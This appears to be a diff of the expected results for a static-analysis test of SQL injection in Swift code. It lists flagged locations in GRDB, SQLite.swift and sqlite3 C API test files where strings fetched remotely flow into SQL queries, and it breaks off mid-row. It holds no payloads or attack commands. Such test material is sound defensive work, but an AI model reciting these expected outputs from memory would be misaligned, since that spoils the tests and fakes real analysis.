| remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | edges | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | provenance | | | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | provenance | | @@ -252,117 +366,3 @@ nodes | sqlite3_c_api.swift:202:31:202:31 | buffer | semmle.label | buffer | | sqlite3_c_api.swift:210:31:210:31 | buffer | semmle.label | buffer | subpaths -#select -| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to 